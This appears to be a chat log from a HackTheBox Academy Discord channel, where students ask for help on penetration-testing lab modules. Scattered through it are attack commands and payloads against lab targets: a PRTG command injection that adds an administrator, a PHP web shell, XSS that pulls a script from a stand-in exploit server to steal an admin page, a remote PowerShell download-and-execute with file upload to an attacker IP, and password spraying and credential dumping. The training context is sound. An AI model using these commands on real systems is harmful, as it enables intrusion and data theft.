#modules

is concealing the trauma in a far far away digital land Everything is great! 😄

Lmao

Out of pure curiosity, was your favorite part the connectivity or the modifications to the files?

TE.CL under HTTP Attacks is driving me bananas

TE. CL?

anyone feel like assisting? ❤️

i would say modifications wbu

Transfer-Encoding and Content-Length

is this CWEE or--? I don't remember off the top of my head if HTTP Attacks is a stand alone module

correct, CWEE

Both breaths in as if in pain It was both.

lmaooo

That's above me, I'm dual-wielding CPTS/CBBH. What's the context?

I've looked at the hint and got the TE.TE part figured out but not sure what else I'm missing.

omg finally passed that section didnt really understand alot but what a pain in the ass

At that point I just blatantly lied to myself and said everything is alright. This is good practice. Repetition is good

Apparently supposed to do a TE.CL exploitation with a TE.TE technique also. Smuggling 3 requests in 2 real sequential requests to bypass a WAF.

Nobody in the public setting around who understands CySec "Right, guys?...Guys?"

LMAOO fr fr

So it's like appending strings in an obfuscated command injection, but HTTP requests? (Don't quote me, but I'll take the correction) @barren torrent

@barren torrent Unsure if this is helpful, but may I dm you a link?

It's from PortSwigger

sure

Sent

I have the HTTP Request Smuggler extension for Burp so throwing that at it now and praying

😅

Once that works, try it manually after reviewing the plugin functionality perhaps? That would be cool

welp, I quit lol

Module: Attacking Common Applications, Section: Attacking Splunk, Question: I have Splunk Enterprise hosted at port 8000, however it has been loading for 30mins (url: https://target_ip:8000/). Could anyone give me a nudge???

i think its suppose to be http not https but not sure

give it a try and see if it works

when i put in http, it said The connection was reset

welp

maybe restart the machine

i restarted it already 😦

or do u need to wait for 5 mins for the target to set up HAHA

i tend to wait 5 min just in case

alright ill try it

It is meant to be https btw

Splunk runs on https

Similar to Nessus

ok i waited for 10mins for the target to set up

it is still forever loading lol

why?

MODULE: Whitebox Attacks
SECTION: Skills Assessment

I've elevated my privileges once (from an account with role = 2). Now I'm stumbling about trying to identify the vulnerability to move along again and could use some help. Some general observations:

• The added capability I have now is viewing the User Management tab of the app, enabling interactivity with manage.php.
• The above permits me to add users of the same privilege and delete whatever account I'm presently signed-in as.
• At-a-glance, I don't think the assessment is looking to perform Type Juggling, as I don't see any loose comparisons being made in add_user() or delete_user().
• I think that there might be some kind of TOCTOU vulnerability at play, since there isn't a SQL lock being put in place in the various INSERT/DELETE operations taking place after the call to fetch_user_data(). However, I don't see what harm would be taking place; the $role being assigned to any created user is fixed as being the same as my present user, so I'm not exactly elevating privileges.
• I entertained the idea of Prototype pollution maybe being involved (i.e. perhaps there's a way to pollute the role value for future accounts to be created as admins), but I didn't see anything suggestive amidst the javascript included in the downloaded source code.

I'm well and truly stuck and would welcome a nudge.

You are on a right track, try to identify a race condition and how you could abuse that. You really have to think outside the box.

why?

RDP connection (attack Host) doesn't works with AD module ☹️

I'm connected during 10 sec then i'm disconnected

keeps disconnecting and not stable yeah

Am I thinking myself or nmap is really slow?

The more I wait,the more remaining time it gets instead of decreasing

https://forum.hackthebox.com/t/footprinting-module-smtp-user-enum/254173/11

<@&861185840277487616>

Taken care of

Thanks

Section: PRTG Network Monitor, Module: Attacking Common Applications. Question: I have created a new user test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add by creating a notification in the PRTG network monitoring and running send a test notification. However, when I run crackmapexec to authenticate against smb with newly created credentials, I can't seem to logon, need a nudge 🙂

cme tries domain login by default, you made a local account

so how do i use cme to authenticate for local account, is there any flag i have to set?

try --local-auth

Still failed :<

I have been stuck here for quite a few hours, and I did all the steps that was in the notes, ill appreciate if anyone could troubleshoot or at least explain where i went wrong

Hello, I am interested in learn hacking, how do I start

make sure the task actually triggered, recheck your steps

Yes, I clicked the Test notification, and they said exe is being queued and no error msg was printed.

do u mind if i pm u the screenshots of the evidences of the task being triggered

you can send screenshots here

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@halcyon dock

Good morning, I am trying to solve the skills assesemnt of ithe intro to assembly module... I am stuck since I dont know what I am doing wrong... I have a shell code from concatenating the info stack from my code but its a wrong answer...

someone has finished this module_

#modules message

It looks like you're stuck on a credential stuffing attempt

Hey guys, for attacking common services easy lab. Can someone clarify why I needed to attach “target username”@inlanefreight@htb and then for initial foothold for the given service the domain didn’t matter?

for a pass the ticket attack using rubeus, is it required to specify a kerberos key to perform the attack? some of the commands use it in the password attacks module in the ptt attack from windows section, and some don't

if you're specifically passing the ticket itself, then you'll need to specify the ticket

either in b64 or the kribi file

do i also need to specify the key

wdym the key

the user hash i think

no, if you're only passing the ticket, you'll only need to specify the ticket

and to create a ticket, ill need the key?

to receive a ticket from KDC, you'll need valid credentials. over pass the hash is where you exchange NTLM authentication to get a kerberos ticket

I run my binary in gdb, put the breakpoint in the loop and type next until rcx is 1

I get this after info stack

does an ntlm hash for a user count as part of the valid credentials

What should I be doing here?how do I find the total packages?
"How many total packages are installed on the target system?"
someone executed this (website on google) "dpkg -l | grep -c 'ii'"

but why?dpkg isnt even a part of this module

what's the loop count

you can pth for ntlm

some things you'll need to google, the module isn't gonna go through every command ever

can i also use it to get a ticket from the kdc?

hm alright man thank you

7

read the Pass the Key or OverPass the Hash part in Pass the Ticket (PtT) from Windows

is the times I press next until I reach rcx 1

so the hash can be used to forge a kerberos ticket?

no. take a look at the disambled binary again

you're not forging the ticket, you're asking the KDC for a valid kerberos ticket

<@&861185840277487616>

so if i have the users ntlm hash, i can use this to ask the kdc for a kerberos ticket, which i can then use in a pass the ticket attack?

yes, that's how OPTH works

well it's not really an attack, it's just different ways to authenticate to AD, NTLM vs kerberos

I'm having problem cracking the hash in "kerberos attacks" skill assessment, basically is the first step. While I can probably use another way to accomplish the task I'm wondering if the correct wordlist to use is "rockyou.txt". Thanks for any tip.

yes

I got it 🙂 started from scratch...

Question: got access to the smb share in the password attacks module (https://academy.hackthebox.com/module/147/section/1327), but the flag.txt file is empty

I'm accessing as the same user that the share is named for, have read/write permissions to the share, and can get the file off the share onto my host machine. It's listed as 0 bytes both on the share itself and on my attacker machine after downloading it.

Is this a bug or is there something I'm missing?

Hay everyone,

Does anyone did the WhiteBox Attack module? I did it already, but I am unsure if the way I resolved is the intended way or not, if anyone solved it could you PM me?

Thanks in advance 🙂

PS. I am talking about the SA in the WhiteBox Attacks 🙂

Easy lab - attacking common services : not easy LOL

Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)

isnt it "--login"?
i literally tried every option i had

sudo su <different user>

That’s if the user you’re changing from is already in the sudo group

oh i thought from the options given in -h

(module 18 btw)

su -h and read the options

didnt work

--command was the right answer

Module numbers mean nothing

oh

my bad

It's better to say the module name

will do

We don't know a modules name based off its number, and we can't look it up based off number either

ah i got you

It just puts in added effort on the part of the person attempting to help

yes and that was shown when you run su -h

oh nvm read it wrong
read it as su -l or something

my bad

better to ask in #homelab-sysadm
This channel is about all the modules in the Academy
If you have no access, read and follow #welcome

Hi, feel free to DM me with your solution 🙂

damn is it only me ?

Potentially yes

hey in footprinting medium skill assignment. while connecting with the sql management studio. it is giving following error. "TITLE: Connect to Server

Cannot connect to WINMEDIUM.

ADDITIONAL INFORMATION:

Login failed for user 'sa'. (Microsoft SQL Server, Error: 18456)

For help, click: https://docs.microsoft.com/sql/relational-databases/errors-events/mssqlserver-18456-database-engine-error

BUTTONS:

OK

"

it says eomething like "no pipe at destination"

Open as admin

And yes you do have the creds if you found the important text

yeah i have them

dont have admin access in xrdp

You can gain admin access

As said you do have the creds

i have the sa user creds

Consider, reuse

ok lemme see

Thanks

Hey y'all, sorry for cross posting this question but I'm very curious. In the "file upload attack" module, under the whitelist filters section, there is a list of characters you can try to bypass file extension filters.
One of those characters I now know is called a "horizontal ellipse" … (a single character, not 3 periods)
https://www.compart.com/en/unicode/U+2026.
I can't find anything concrete on how/when/why … could be used in an injection. Does anyone have any examples of this in the wild? I asked our AI overload chatGPT but the response was pretty generic/vague. I have been playing around with it locally on the command line.
Linux is fine with files and folders called …, so I don't think its applicable there.
Powershell and CMD (using Windows terminal and PowerShell terminal) have trouble rendering it (they render a . in my testing) but if you run ls … it will fail with "cannot find file …" so that seems to be purely a cosmetic/rendering issue.

Does anyone have any pointers to help me get out of this rabbit hole I find myself down?

Probably is a problem with your ISP

Dm if you need still help

Thank you!

hey the sql management studio is stiill showing login failed. crosschecked password.

Use windows login don't switch the login type

Once you're the right user/logged in as a*

yeah been there, iam just confused about what iam looking for there.

sorry i meant adm*

you need to be logged in as adm* -> run MSSQL as administrator -> click through the database
OR if you know how to query:
log in as adm* -> run mssql as administrator -> click new query -> run the query

note querying and stuff is really not touched on well in this module, it's gone over more in Attacking Common Services

Anyone able to help me out with Broken Authentication - Predictable Reset Token section? i just can't get this thing working no matter what

+/- 1 second (1000ms) UTC

well like i said i tried that already and it just won't work for me

#modules message

thank you let me try those things then

You have to create a token for every millisecond.
In order not to kill the server, you should stay within the time limit. So +/- 1 second.
This already generates 2000 requests

yeah i see the hint says ms but 2000 requests sounded a little bit too much for me so i didn't really go that route

2 seconds = 2000 milliseconds

to be precise, it is even 2001 milliseconds

-1 second, +1 second, current time

-1 second (1000ms)
Event generate token 1ms
+1 second (1000ms)

hello guys.. in AD attack module I cracked the wley password but hashcat don't display it. Do you know why?

--show

nothing

Got it. Thanks to both of you for saving me from a headache!!

Hello, can I use the kali loaded from my usb drive instead of a vm to connect to htb network through the vpn?

You mean instead of the PwnBox?
Yes, you can use your own VM.

For this
If you are using pwnbox then time will be already in UTC
If personal VM then NOT in UTC

Hence process is:
Have the time in UTC, then converter to EPOCH ( web based UTC time to EPOCH converter is available in Google)
Start time= EPOCH time in milliseconds -1000
End time= EPOCH time in milliseconds+1000

Now generate the tokens with this range and
Then brute force it

Hope you will get it

They've since resolved it

.

Ooh ok
I went with the query directly

stuck on enumeration for "Attacking common services - medium lab", any nudges?

Read the synopsis

Where are you stuck

used user.list and pws.list on the ftp service but doesnt seem to work

did that lol

Scan all ports

yeah i saw the hint for the 6th one and brute forced that, no avail

No need to bruteforce

SMH

thanks

Yw :)

medium lab was easier than the easy lab... ok

Yeah btw the mail service is like entirely unneeded

big sad

Having trouble on the Skills Assessment for File Uploads. I can successfully read '/etc/passwd' & 'upload.php' source code. However i get no luck uploading a php shell. Any guidance?

Hey guys! Im sorry to bother with a trivial error but im hard stuck at XSS Bypass module. I found a few bypasses for XSS (object with base64, iframe with srcdoc HTML encoded) but I cant seem to get any admin callbacks? I read somewhere its to do with HTML encoding my XSS payload? Im kinda lost on this one.

XHR request gives me this (on my local machine):

NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://vulnerablesite.htb:53486/home.php'. 

in the pass the ticket from linux section of password attacks, i can't seem to access \dc01\julio. im getting this error:

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure.  Minor code may provide more information
Ticket expired


Error: Exiting with code 1

ticket expired

Any clues on footprinting skill assessment hard. from where to start?

Scan all ports tcp and udp

curl https://www.inlanefreight.com > htb.txt cat htb.txt | grep "www.inlanefreight.com | tr " " "\n"
When i use this, it puts my mode into input mode. How do i exit out of it without having to close my terminal all the time when this happens. I've tried (esc) Also if you could tell me why it does this as well?

tried running the command on the target host, im getting this error now:

<user>@inlanefreight.htb@linux01:~$ smbclient //172.16.1.5/C$ -k -c ls -no-pass
Kerberos auth with '<user>@INLANEFREIGHT.HTB' (\<user>@inlanefreight.htb) to access '172.16.1.5' not possible
session setup failed: NT_STATUS_ACCESS_DENIED

nvm got it

C$ is an admin only share

does your user have the rights

HTB AD Skill Assessment 2
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I got a reverse shell on SQL01 and transferred mimikatz. I got NTLM Admin hash, and I tried to do pth with evilwinrn to the MS01. Somehow tho it doesn't work. Any ideas?

I tried without single quotes as well*.

winrm is a domain thing, you got the local admin hash

Ouch.

try other creds that you got

i will dump sam

and everything on sql01

anybody know how to get a flag if im in ftp?

yes dump everything

i see flag.txt but when I try to cat it it says invalid command

Invalid command

https://letmegooglethat.com/?q=ftp+commands

I am pretty sure you can't cat in ftp, use get and cat it locally.

strange

thanks

This one's worth a try

ghostery is breaking javascripts on academy site. the menu element for modules and path doesnt open

yeah that's one of the reasons they tell you to disable adblockers i think

sure but that still shouldnt happen

just disable it for academy

did anyone know how to use academy solutions

#academy-announcements message

i think you enable it in settings

Could I possibly do a 1 liner in cmd to enable rdp so i can have better view and do other shenanigans straight from the rdp session.

thanks and it worked

yes of course thats a bandaid but it still should be fixed

I got the admin hash I could possibly do pth with rdp?

why do you want rdp? psexec gives you a system shell, you can do whatever you want there

there are several registry keys that could prevent RDP, you can disable them but in my experience the box still doesn't allow you to remote in i think they have additional things in place that stop it.

welp, I gotta smoke that copium then

Not vm, i mean from a live usb stick

i....I don't think I was supposed to dump sam. Could I possibly disable UAC or something or should I continue with smth new?

you def can dump the hives, somethign is wrong with your smbserver

I saw what it is...it's the name

I messed up the name...

that o O ... bruh

Nevermind, wasn't that

look at your ip, that doesn't look like a vpn tun0 ip to me

is that the parrotbox or something

The 172.16.7.60 can't have outbound connections to any 10.10 --. It can only connect to it's 172.16.X.X

I wanted to dump them on the main box 172.16.7.240 from the 172.16.7.60.

So I can download them from my attack host

Essentially 172....60 -> .240 -> <myKaliHost>

block unauthenticated guest access

put a password on it

That's such a brainrot, I lowkey love it.

Will do.

my solution was to simply download with CME

Worked :D

Hey guys I have a question relating to the XSS Bypass module (Advanced XSS and CORS):

So I have a payload in my exploit server which works well and retruns data from my exfil server. But:

1. When I use the XSS payload - ||<object data="data:text/html;base64,<Base64- representation of <script src="http://exploitserver.htb/exploit"></script>>">||
   I get back a response but it is just Network errors

2. When I use the XSS payload - ||<ScRiPt SrC="http://exploitserver.htb/exploit"></ScRiPt>||
   I get back the correct reponse with the base64 encoded page admin.php.

My question is why? In both cases my script is executed and calles back to log but then why the difference?

Literally because of the casing, that's it

In one instance the lowercase is being filtered, the other the casing isn't properly filtered so it goes through

how do I get the password for WORKGROUP?

https://forum.hackthebox.com/t/htb-academy-footprinting-what-version-of-the-smb-server-is-running-on-the-target-system-submit-the-entire-banner-as-the-answer/268587

i can access the SMBshare but I can't get the password

But the casing being blocked would mean my payload would be blocked but it isn't it runs and a call to exploit server is made it's the exploit in the server that is erroring

¯_(ツ)_/¯

You're doing a Null session just hit enter

Alternatively just add -N to your command

-N doesn't prompt for a password

gives me this

10.129.107.57sambashare: Not enough '' characters in service
Usage: smbclient [-?EgqBNPkV] [-?|--help] [--usage] [-M|--message=HOST]
[-I|--ip-address=IP] [-E|--stderr] [-L|--list=HOST]
[-T|--tar=<c|x>IXFvgbNan] [-D|--directory=DIR] [-c|--command=STRING]
[-b|--send-buffer=BYTES] [-t|--timeout=SECONDS] [-p|--port=PORT]
[-g|--grepable] [-q|--quiet] [-B|--browse]
[-d|--debuglevel=DEBUGLEVEL] [--debug-stdout]
[-s|--configfile=CONFIGFILE] [--option=name=value]
[-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
[-R|--name-resolve=NAME-RESOLVE-ORDER]
[-O|--socket-options=SOCKETOPTIONS] [-m|--max-protocol=MAXPROTOCOL]
[-n|--netbiosname=NETBIOSNAME] [--netbios-scope=SCOPE]
[-W|--workgroup=WORKGROUP] [--realm=REALM]
[-U|--user=[DOMAIN/]USERNAME[%PASSWORD]] [-N|--no-pass]

Well because you either need to do \\\\IP\\SHARE or //IP/SHARE

after what?

smbclient -U "" -N //IP/Share

Also your error is just listing all the smbclient options, it's not the error code

sudo smbclient -U \10.129.107.57\sambashare -N //IP/SHARE
do_connect: Connection to IP failed (Error NT_STATUS_NOT_FOUND)

I need to connect to the share and get a flag

Incorrect

That's not the syntax I just showed you

Marcie you have the patience of a saint. lol

Also btw it's reading the \10.129.107.57\sambashare as the username

nvm got it

I suggest also learning what placeholder text is

I use it quite often to generalize syntax, which is what you should do for your notes

-U = user
-N = do not prompt for password

Aka sends the password as ""

yeah now its asking me to find the domain the server belongs to

Not everything will be found with smbclient

Read the section to figure out how to enumerate more info

There's 2 main things you work with

hey what do you do when, while taking notes on a topic, you feel like you're just writing stuff down instead of actually comprehending it
is this normal

Whats up ya'll I currently in need of some help with this module. I just cannot seem to get the flag. Would anyone mind helping me step by step?

I'm able to ssh into it as user4, and cd into Documents and list flag.txt but I receive 0-30

Yes i go through this all the time. Helps if i re-read my notes a couple times.

I like to take a break, and come back to it. If I still struggle I'll check out a video, or ask GPT to explain it in simplet terms. Sounds like it could be a tad bit of burnout.

probably don't just straight up give the answer or the command to get the answer, you can tell them where to look or the steps to take, it will help them learn instead of handing the answer

isn't that what i did
i pretty clearly said "try taking another look through the finding files and directories, user and group management, and finding and filtering content sections"

and also recommended they look in the documentation for a specific command

doesn't change the answer being right there

you in particular
you in particular constantly grossly misinterpret and/or misread every single thing i say here
every time you say anything to me it's almost always something i said that you dislike and you read over a huge chunk of whatever i say and you just read the parts you don't like

i can think of like three other times where you personally have done this

there i deleted the fucking answer

I would refrain from giving exact file location, the command is enough

I DELETED IT

Also heavy spoiler dude. Don't do that

what gave you the idea that I dislike anything that you said? but alright, I won't reply to you anymore, have a good one

there it's all gone

literally like 10 times today and across three different mediums i've tried to help someone with something and people just get mad at me about it

im sorry and i appreciate your help . sorry i missed your message before deletion could you DM me?

no

find a write up if you're still stuck i quit helping people

It's not being mad it's literally spoiling, also, my network is being dumb so I didn't see it deleted

Helping to get the answer is one thing but revealing the exact file location and answer is another

The point of the exercise was to find it yourself

Finding a writeup for this particular session is practically non-existent and the HTB forums are horrendous to find writeup or help as i've browsed there for hints at what I can do so that I myself may get the answer myself without spoiling

look through the module

so yes, i believe HTB forum help SHOULD get a hard review and good look at

so again any and all hints are greatly appreciated

It's a recursive get-childitem command

otherwise I'll just take ya'lls messages as I'll go f*** myself

thank you marcielee

The forum is just a bunch of people asking and getting answers, there's no direct writeups on the forums

Thank @loud dagger

why

You're the one that had the command

yea then people chewed her out for trying to be helpful

but anyway

Thanks for ya'lsl time

I'm not trying to discourage you from helping, just trying to ask you to be mindful of spoiling direct content ¯_(ツ)_/¯

I.e. giving the command to help find it is ok.
Saying the file location and the contents of it is not. Especially in this instance where they purposely give that user a bunch of empty flag.txt to sift through

this is now the third time you've told me this

you can stop now

Sorry for repeating myself

But don't be discouraged. Your intent was to be helpful.

@next bronze So, I dumped Sam. Got hashes that I already have. I will try everything from the password attacks module and ad enum section. Is it okay if I contact you when I am stuck? I couldn't find anything of use from the Sam,security,system .save

the question is to get admin on ms01 yeah? you would have found creds from a certain svc account

Oh...that. Well I found hashes even from mimikatz.

Yeah

So I didn't need to go that far with the hives.

Iirc mimikatz worke similarly depending on the submodule used

I found a writeup in Lao language.

Different ways to prep a potato

So I can't exacpe the juicy potato..

Boil em, mash em, stick em in a stew

Nah, not a reference to juicy potato

I did the sql01 part.

Just saying many ways to do the same thing

Oh.

yeah, but transferring out the reg hives are also useful, the output from mimi is pretty hard to read tbh

True

try that account then

I just stare at it until it makes sense

I will try to crack the hash first.

And uh..I still don't get.

How could that account work for MS01.

Domain joined accounts are fun

I could try to check setspn.exe -q / to see what kind of acc it is.

It's a service account

¯_(ツ)_/¯

Logic says it's for a specific service so my head says it's for a specific host. However you remind me of a thing u said.

Don't make assumptions.

try first, question later. doesn't take much time to probe with netexec

Service accounts are just fancy user accounts

Exhausted, pth is on the way.

is it just me or does htb academy overexplain a lot of things

There's never too much.

i disagree

Eh I'd rather overexplain than underexplain

^

guess i'm just stupid then

Nah

Sometimes, occasionally, things just are explained in a dumb way (or not at all)

So, evil-win didn't accept the mssqlsvc hash for the MS01.

Let see what's that netexec thing.

winrm is not always enabled, generally don't use it to test if it's a valid account

Also I have a question:

I have an answer:

What's the difference between these 2:

Will note that.

I could try with psexec.

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

let's see what it says either way

yeah even the mimikatz repo gets flagged as that

Occasionally

Sometimes the cert expires and it's funny

I forgoR the lm hash mb.

Well, I'm glad someone's getting help from here. 🫡

I am too restarted to do this by myself.

I am trying tho!

Haha same here I'm trying

you can just do :ntHash

For Blacklist Filters in File Upload Attacks module, I get a "File successfully uploaded," then I go the SERVER_IP:PORT/profile_images/shell.ext?cmd=id and I'm getting a 404 error. I'm assuming I'm uploading the file wrong though Burp? I change the filename and contents of the uploaded file to the given: <?php system($_REQUEST['cmd']); ?>

https://tenor.com/view/hot-hair-flip-side-eye-gif-20790621

Tried it and encountered a new stop, it requires a pass, I will try to use the -no-pass thingy.'

if you still need help with your question, I believe that hints were already given, but look up how to filter files by sizen with powershell

if you're using pth it wouldn't ask for a pass

This may sound stupid but I ssh as user4 and within terminal do I run ps? If so how would I launch ps ? Or would I use ps from parrot os

Yeah, tried. Didn't work. No shares are writable. I didn't include the domain tho, so I will try that next.

literally just enter powershell in cmd

Alright once I'm in . Now I'll go read as I was told

Also @next bronze appreciate it!

W Xre0us and Marcie.

I am done for today though, tired a bit I will go to sleep and end the SA2 tomorrow. Let's hope the next modules won't be that bad and won't be that long.

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

This executes PSUpload.ps1 right?

it's the equivalent on linux of doing something like
wget http://github/code.sh | sh
correct?

doesn't write anything to disk right?

yeah assuming the script is purely executable code and doesn't write anything to disk

ok thank you.

I then don't understand how this is working:

`PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts
[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373`

i guess my point is what is the point of executing PSUpload first?

the powershell script adds the invoke-fileupload function to your powershell session

look at psupload.ps1 itself

heeeey im gettin somewhere! lol

For some reason in the File Inclusion PHP Wrapper section, the target is showing vulnerable to the EXCEPT wrapper, but when running the command it does not give the uid as it does in the example.

I was already able to get the flag with another method in the module, I just wanted to see if anyone can check for me to see if their command works.

curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

Here is my command showing it vulnerable

base64config is just a text file containing the output of the config piped to base64 since it was too long and froze my terminal

ahhh that makes sense thank you

Any leads on snmp v3 enumeration? doing footprinting hard assignment

Does anyone know how I can acess DC01 on the AD Skills Assessment 1? I have the admin hash, is there an easy way to now access the DC01 machine. Do I need to set up a SOCKS proxy through the machines or is there a better way?

So basically I am on MS01 but I cant find a good way to get onto DC01

@strange forge have you tried community string brute forcing?

C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt```

what's teh use case for creating a command file.... i understand what is going on

but since we already have the shell why don't we just use ftp interactively

yes i got the community string. not able to figure out next approach

ok did u use the community string?

yes with snmpwalk and braa

ok did u look at the output of snmpwalk?

and/or braa?

a user tom is there

nice

so you found some creds

what u gonna do with those creds

no pass just user. bruteforcing here?

just user?

are u sure

yeah

look again

ohh got it

hello guys how to fix this output

┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt

__             __               __     

/ /_____ / / _______ / /
/ //_/ _ / / __ / / / / / __/ _
/ ,< / __/ / / // / / / // / // __/
//||_// /.// _,/_/___/

Version: dev (9cfb81e) - 05/01/24 - Ronnie Flathers @ropnop

2024/05/01 18:30:58 > Using KDC(s):
2024/05/01 18:30:58 > 172.16.5.5:88

2024/05/01 18:30:58 > You must specify a password to spray with, or --user-as-pass

it says right there, you need to specify a password to spray with

already spray password

what?

oky oky sorry my bad

I forgot to enter password

can anybody help with the web api skill assessment?

is EU VPN really slow atm for you guys, too?

im o powershll wy doesnt the commad work like i do Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose but it just gets frozen and doesng do output but i cn canl cmd

for
Active Directory Enumeration & Attacks

Page 20
ACL Enumeration

ACL Enumeration just need to rdp into htb only and not coinnect to dc right

Was the same for me, it may work, guess because of Get-DomainObjectACL -Identity * it querys everything it can find. You could directly specify the Group directly if you know it. f.e Get-DomainObjectACL -ResolveGUIDs -Identity "Groupname"

It also just takes time as each ACE is listed under the ACL listing so it's grabbing a lot of info

exactly 🙂 that was what I was trying to explain

Yep

I wasn't disagreeing I was just expanding that it's a LOT of info depending on how many objects exist

And that it's not freezing, it's just doing it's job. If there wasn't the filter there... boy howdy

yeah I run it without the sid filtering and there is a lot of info 😄

ListChildren, GenericWrite, ReadProperty

• 0 What privileges does the user damundsen have over the Help Desk Level 1 group?

tf why AceType : AccessAllowed
ObjectDN : CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength : 0
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-4022
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1176
AccessMask : 131132
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed

why ont it ork

?

What's "not working"

you are on the right track, check what you can do with one of the ActiveDirectoryRights you have

Why am i always directed to this channel when I’m looking at other ones

the answer ListChildren, ReadProperty, GenericWrite

Because you're not verified, read and follow #welcome

but it says its not it

It's only one of those

how

what is not?

the 3

As I said it's one of those, perhaps refresh your memory by rereading the section

Only one of them is the answer, the others are rights- not privilges

It's specifically asking, in this instance, what stands out

ListChildren and readproperty just means he can look at them

And generally can't be abused

Does anyone know how to access DC01 on the active directory skills assessment 1. I have the administrator hash and I spawned a new cmd with mimikatz under the context of the administrator user. I have tried to access the DC with Enter-PSSession however I am getting errors and it does not seem to work.

My next strategy is to use chisel so I can run CME or something on my kali machine?

Is there another way to access DC01?

I have not been able to RDP to Windows machines lately. Has anyone encountered the same problem?

can someone help me, im doing Attacking Common Applications section Exploiting Web Vulnerabilities in Thick-Client Applications. i am following the instructions to exploit but once i get to the step of having to open the fatty-server.jar it wont transfer to my desktop and outputs this instead

How lately? I connected a few hours ago. Post the command you are using and the error.

here is the part i edited as shown in the instructions just not sure if i need to put the /* */

Hey, how to bruteforce using hydra when https is requiring authentication. iam trying http-post-form but there is no success or failure condition i know

Stuck on "Bypassing Blacklisted Commands". I found the flag file, but the command I'm issuing doesn't return data. I think I fail to understand the significance of the numbers in the bypass. Can someone explain

Why don't you know the failure condition? What happens when you put in the wrong creds?

there is a popup for credential. as the page loads the popup asks for creds. on entering wrong creds it ask for cred again

Then the failure condition is the popup

¯_(ツ)_/¯

Or the base page info

I take it you've already done an inspect element to try and look for it

I would probably do something like setting success to 302.

basic auth, hydra can brute force this.

iam forgetting the command

You are trying to use http-post-form when it should be basic auth.

hydra -L user -P pass ip

I can. Best if you can ask your question here, but you can DM if needed.

Add http-get

in the string ${PATH:0:1} I assumed the middle digit was the start of the line and the second is the number of characters that are printed

in practice with the bypass string I issued for the question in Bypassing Blacklisted Commands, it doesn't print anything

despite putting 15 in the second place

Yes, that is right, so $PATH pretty reliably starts with / so starting at the first character 0 and grabbing one character 1 gets you a /

Remember that the $PATH is on the remote machine, so unless you know what the 15th character is, you should find another way.

I guess that's the second piece, what is actually happening

Normally when I see that error I just haven't waited log enough (after starting the machine). But, double-check that you are using the right creds.

yep true creds

but dont working

I can ping the machine

I would reset the box. This is the command I use, but shouldn't make a difference: xfreerdp /dynamic-resolution /cert:ignore /timeout:50000 /compression -themes -wallpaper /network:broadband /v:$ip /u:$user /p:$pass

Did you get it?

see dm

im going to crazy -_-

Try with remmina, if the issue persists -- wrong creds

Add /cert:ignore

I mean logon failure means wrong creds

I tried remmina and it worked this time, but I couldn't really RDP for a few days.

ohh i use this command its work reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

https://academy.hackthebox.com/module/147/section/1638

anyone T-T

Why is access denied, can anyone help me

Try doing type and point it to the file directly 🤷‍♂️

this is giving a lot of false positives. no network activity while debugging. how to get either fail or success condition?

Try adding /sec:nla to the xfreerdp

Configure the command with either a failure or success condition.

yeah i figured that out. there is no network activity when login fails. any hint what iam looking for

I would probably try to find something that is on the HTML for the landing page that is likely not on the successful login page (or the other way around).

http basic authentication returns 401 if the credentials are wrong, I've never seen false positives with hydra using basic auth https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication

That's likely why it wasn't loading, as shown by the section

Guys im doing the AD skills assessment #1

I've cracked the hash of svc_sql, i have a shell on dc01.inlanefreight.local
So i need to auth to mssql on this domain: SQL01.inlanefreight.local
I started by importing powerupsql & ran this to see the instances
Get-SQLInstanceDomain
I saw the instances so I crafted this command to login

Get-SQLQuery -Verbose -Instance "SQL01.inlanefreight.local,1433" -username "SQL01.inlanefreight\svc_sql" -password "correct_pass" -query 'Select @@version'

However it just hangs, first I tried it with lowercase sql01 but it's just hanging man, on psexec and a netcat shell.

Well 1433 is the SQL port

doing the attacking common services easy assignment.

But otherwise it could be you're using the wrong syntax

ok, will look at cheatsheet

Yeah you don't need to specify sql01.inlanefreight

for the user correct?

Yes

man this assignment is really ridiculous. bruteforcing for the pass with rockyou is taking ages.

Using rockyou sounds like a bad idea

It's an insanely large list, is there not another provided list?

